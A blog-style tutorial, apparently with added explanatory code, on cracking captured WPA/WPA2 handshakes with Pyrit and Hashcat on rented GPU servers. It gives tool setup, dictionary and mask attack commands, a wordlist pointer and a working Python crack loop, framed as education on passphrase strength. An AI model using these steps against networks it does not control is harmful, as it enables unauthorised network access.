DISCLAIMER: The information provided in this post is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information on this website is meant to help the reader develop a hacker defence attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage, directly or indirectly. You implement the information given at your own risk.
In this post we are going to see how practical it is to run a brute force (strictly speaking, a dictionary) attack against a captured WPA or WPA2 handshake. A couple of years ago WPA/WPA2-PSK was considered secure enough, but with the current power and cost of cloud computing anyone with the slightest interest can rent a very fast GPU server for brute force attempts at a very low price (as low as $0.6 per hour!). The protocol itself is not broken: each guess costs one PBKDF2-HMAC-SHA1 run of 4096 iterations, which was a reasonable cost in 2004 and is cheap on a modern GPU, so the only thing protecting a PSK network is the strength of its passphrase.
I am going to walk through my experiment and share the details and results with you. There are dozens of tutorials for this out there, but this is just my own little experiment.
Brute forcing a WPA or WPA2 password begins with capturing the four-way handshake of the target WiFi. I am not going to cover that here, as there are plenty of guides for it; the Kali Linux toolbox (aircrack-ng and friends) provides everything you need. Note that the capture must contain a real handshake, at least EAPOL messages 1 and 2 (or 2 and 3) of the same exchange; a beacon or a lone message 1 gives the cracker nothing to verify against. So we will assume you already have the WPA four-way handshake in a file named handshake.cap.
NVIDIA provides an Amazon Linux AMI with the NVIDIA GRID GPU drivers pre-installed. I used a g2.8xlarge, which comes with 4 GRID GPUs, 32 vCPUs and 60 GB RAM. It cost me $2.6 per hour in the Oregon region.
Once the instance is launched, SSH in and install the build dependencies:
sudo yum install python-devel openssl-devel zlib-devel libpcap-devel glibc-devel gcc make
Then we get to installing the required tools. There are two high-performance tools for this job: Pyrit and Hashcat. Pyrit is built specifically for attacking WPA/WPA2 handshakes, while Hashcat is a general-purpose password cracker that also supports them (hash mode 2500). Which one performs better depends on your environment, but my personal preference is Pyrit! Both tools have separate packages for CUDA-enabled systems. (Be aware that Pyrit is no longer maintained, so for current work Hashcat is the safer choice.)
There is another tool named Scapy that provides some functionality for the WPA/WPA2 protocol. Scapy is not used in this experiment, but I have included its installation steps below.
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/pyrit-0.4.0.tar.gz
tar xvzf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/cpyrit-cuda-0.4.0.tar.gz
tar xvzf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
vi setup.py
Edit setup.py so that the CUDA include path points at the headers shipped with the AMI, otherwise the build cannot find them:
NVIDIA_INC_DIRS = ['/opt/nvidia/cuda/include']
python setup.py build
python setup.py install
ln -s /usr/local/bin/pyrit /usr/bin/pyrit
pyrit benchmark
The benchmark should list the GPUs as CUDA devices; if it only shows CPU cores, the CUDA module was not built correctly.
wget http://www.secdev.org/projects/scapy/files/scapy-latest.zip
unzip scapy-latest.zip -d scapy
cd scapy/*/
python setup.py build
python setup.py install
ln -s /usr/local/bin/scapy /usr/bin/scapy
Pyrit can be used in two ways. The first is to import the passwords and the ESSID into Pyrit's database and let Pyrit precompute the PMK for every ESSID:password pair in a batch. This front-loads the expensive PBKDF2 work, so that a later attack on a capture for that ESSID (Pyrit's attack_db command) only has to do the cheap per-handshake MIC check:
pyrit -i dictionary-file import_passwords
pyrit eval
pyrit -e 'target_essid' create_essid
pyrit batch
or just run the handshake directly against a list of passwords without storing anything. The strip step first drops every packet except the handshake, which keeps the capture small:
pyrit -r handshake.cap -o clean-handshake.cap strip
pyrit -r clean-handshake.cap -i dictionary-file attack_passthrough
The last thing to share is the dictionary (word list). There are gigabytes of dictionaries out there, but most have not been processed for WPA. A WPA/WPA2 passphrase is 8 to 63 printable ASCII characters long, so any shorter or longer entry is wasted effort. Pyrit's import_passwords step drops such entries and removes duplicates to produce the most efficient dictionary.
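To make concrete what Pyrit and Hashcat actually do with each dictionary entry, here is an added example (not code from the original post or from either project) that walks one candidate passphrase through the WPA2-PSK derivation: PBKDF2-HMAC-SHA1 over the SSID to get the PMK, the 802.11i PRF-512 to get the PTK, and an HMAC-SHA1 over EAPOL message 2 to check the MIC. It also applies the 8-to-63 printable ASCII filter described above. The SSID, MAC addresses, nonces and the EAPOL frame are constructed for the example rather than taken from a capture, and only the WPA2 key descriptor version 2 (HMAC-SHA1 MIC) is handled; a real run would pull these values out of handshake.cap and WPA/TKIP captures use HMAC-MD5 instead.

```python
import hashlib
import hmac

# --- constructed handshake parameters (no real network was captured) ---
SSID = b"ExampleNet"
AP_MAC = bytes.fromhex("001122334455")   # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")  # supplicant address (SPA)
ANONCE = bytes(range(0x10, 0x30))        # 32-byte nonce from EAPOL message 1
SNONCE = bytes(range(0x40, 0x60))        # 32-byte nonce from EAPOL message 2
# EAPOL-Key layout: hdr(4) desc(1) info(2) keylen(2) replay(8) nonce(32) IV(16) RSC(8) ID(8) MIC(16)
MIC_OFFSET = 81

PRINTABLE_ASCII = {chr(c) for c in range(0x20, 0x7F)}


def is_valid_wpa_passphrase(pw: str) -> bool:
    """802.11i limits a PSK passphrase to 8..63 printable ASCII characters;
    anything else can be dropped from a wordlist before any PBKDF2 work is spent."""
    return 8 <= len(pw) <= 63 and all(c in PRINTABLE_ASCII for c in pw)


def pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    This is the only expensive step of a guess, and it depends on nothing but the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def pmk_self_test() -> bool:
    """IEEE 802.11i Annex test vector: passphrase "password", SSID "IEEE"."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return pmk(b"password", b"IEEE").hex() == expected


def ptk(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: HMAC-SHA1 over a fixed label, the sorted MACs and sorted nonces.
    Four 20-byte blocks give 80 bytes, truncated to the 64-byte PTK; KCK is the first 16."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2, key descriptor version 2: MIC = HMAC-SHA1(KCK, frame with the MIC field zeroed)[:16]."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (no key data) with an all-zero MIC field."""
    frame = bytearray(99)
    frame[0], frame[1] = 1, 3                  # 802.1X version 1, type EAPOL-Key
    frame[2:4] = (95).to_bytes(2, "big")       # body length
    frame[4] = 2                               # descriptor type: RSN
    frame[5:7] = bytes([0x01, 0x0A])           # key info: MIC set, pairwise, descriptor version 2
    frame[7:9] = (16).to_bytes(2, "big")       # key length for CCMP
    frame[9:17] = (1).to_bytes(8, "big")       # replay counter
    frame[17:49] = snonce
    return bytes(frame)


def make_handshake(passphrase: str) -> bytes:
    """Produce a constructed message 2 carrying the genuine MIC for the given passphrase."""
    frame = build_msg2(SNONCE)
    kck = ptk(pmk(passphrase.encode(), SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack(eapol: bytes, wordlist, ssid=SSID, aa=AP_MAC, spa=STA_MAC, anonce=ANONCE, snonce=SNONCE):
    """Return the first candidate whose derived KCK reproduces the frame's MIC, else None.
    This loop is exactly what Pyrit's attack_passthrough and hashcat -m 2500 parallelise."""
    target = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for pw in wordlist:
        if not is_valid_wpa_passphrase(pw):
            continue                       # cheap rejection, no PBKDF2 spent
        kck = ptk(pmk(pw.encode(), ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), target):
            return pw
    return None


if __name__ == "__main__":
    sample = make_handshake("correct horse")
    words = ["short", "password", "wrongpassphrase", "correct horse", "x" * 64]
    print("PBKDF2 self-test:", pmk_self_test())
    print("recovered:", crack(sample, words))
```

Because the PMK depends only on the passphrase and the SSID, precomputing it (Pyrit's batch mode, or rainbow tables for common SSIDs) pays off whenever the same SSID is attacked more than once, which is why a unique SSID is a small but real hardening step.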
I am going to share a link (but again, as I mention in the disclaimer, I am only sharing information; you are fully responsible for how you use it) to a dictionary of 3,902,508,361 unique WPA2 passwords HERE (27GB).
*If you use megatools, you can do as below (make sure the link uses mega.co.nz and is wrapped in single quotes):
Extract it with:
tar xvzf dic.tar.gz
Once done, move the password directory to this path:
and run "pyrit eval" to confirm the passwords are visible to Pyrit.
Hashcat can be installed as follows:
rpm -i http://pkgs.repoforge.org/p7zip/p7zip-9.20.1-1.el7.rf.x86_64.rpm
wget http://hashcat.net/files/cudaHashcat-2.01.7z
7za x cudaHashcat-2.01.7z
cd cudaHashcat-2.01
./cudaHashcat64.bin -b -m 2500
To convert the .cap capture into the hccap format Hashcat reads, use aircrack-ng. Download and build it as follows:
yum install -y git-svn libpcap-devel sqlite-devel gcc gcc-c++ libnl-devel openssl-devel usbutils pciutils rfkill wireless-tools glibc*
wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
tar xvfz aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
make
make install
ln -s /path_to_aircrack/aircrack-ng-1.2-rc4/src/aircrack-ng /usr/bin/aircrack-ng
Once installed, convert the capture and run Hashcat against it (hash mode 2500 is WPA/WPA2). The Linux CUDA build is cudaHashcat64.bin, not the oclHashcat64.exe Windows binary:
aircrack-ng file.cap -J file.hccap
cd /path_to_hashcat && ./cudaHashcat64.bin -m 2500 file.hccap words.dic
You can also run a true brute force attack over a custom mask; this one tries every eight-digit numeric passphrase:
cd /path_to_hashcat && ./cudaHashcat64.bin -m 2500 -a 3 file.hccap ?d?d?d?d?d?d?d?d
If you see
>>> ERROR: cuModuleLoad() 301
CUDA error 301 means "file not found": Hashcat could not load its compiled kernel files. Run the binary from inside the Hashcat directory so its resources are accessible.
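Before launching a mask attack it is worth knowing whether it can finish in the rented hours. The following is an added example (not part of the original post and not Hashcat's own code) that computes the keyspace of a hashcat -a 3 mask, including the built-in charsets (?l ?u ?d ?s ?a ?h ?H ?b), custom charsets passed as -1..-4, and literal characters, and turns it into a running-time estimate from a benchmark rate. The rate used in the usage call is a placeholder to be replaced with the figure from "cudaHashcat64.bin -b -m 2500" or "pyrit benchmark"; it is not a measurement.

```python
import string

# hashcat's built-in charsets; ?s is the 33 printable ASCII symbols, ?a is all 95 printables
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
    "h": "0123456789abcdef",
    "H": "0123456789ABCDEF",
    "b": "".join(chr(i) for i in range(256)),
}
CHARSETS["a"] = CHARSETS["l"] + CHARSETS["u"] + CHARSETS["d"] + CHARSETS["s"]


def expand_charset(spec, custom=None):
    """Expand a charset spec such as '?l?d-_' into the set of characters it covers.
    '?x' is a placeholder, '??' is a literal '?', anything else is a literal character."""
    custom = custom or {}
    chars = set()
    i = 0
    while i < len(spec):
        if spec[i] != "?":
            chars.add(spec[i])
            i += 1
            continue
        if i + 1 >= len(spec):
            raise ValueError("dangling '?' in charset or mask")
        sel = spec[i + 1]
        if sel == "?":
            chars.add("?")
        elif sel in CHARSETS:
            chars.update(CHARSETS[sel])
        elif sel in custom:
            chars.update(custom[sel])
        else:
            raise ValueError(f"unknown charset ?{sel}")
        i += 2
    return chars


def mask_keyspace(mask, custom_specs=None):
    """Number of candidates a hashcat mask generates.
    custom_specs maps '1'..'4' to the string given after -1..-4; a later custom
    charset may refer to an earlier one, as hashcat allows."""
    custom = {}
    for cid, spec in sorted((custom_specs or {}).items()):
        custom[cid] = expand_charset(spec, custom)
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            total *= len(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            i += 1          # literal character: exactly one choice
    return total


def eta_seconds(mask, guesses_per_second, custom_specs=None):
    """Worst-case running time: every candidate is tried and the last one matches."""
    return mask_keyspace(mask, custom_specs) / guesses_per_second


if __name__ == "__main__":
    RATE = 100_000          # PLACEHOLDER guesses/s; replace with your benchmark figure
    for mask, custom in [("?d?d?d?d?d?d?d?d", None),
                         ("?1?1?1?1?1?1?1?1", {"1": "?l?d"}),
                         ("?a?a?a?a?a?a?a?a", None)]:
        secs = eta_seconds(mask, RATE, custom)
        print(f"{mask:20s} keyspace={mask_keyspace(mask, custom):>20,d}  "
              f"worst case={secs / 86400:,.1f} days at {RATE:,d}/s")
```

The contrast between the three masks is the whole point of the post: eight digits are trivial, eight lowercase-or-digit characters are a matter of days on a single GPU instance, and eight characters from the full printable set are centuries at the same rate. A passphrase drawn from the last keyspace, or simply a longer one, is what actually keeps a PSK network safe.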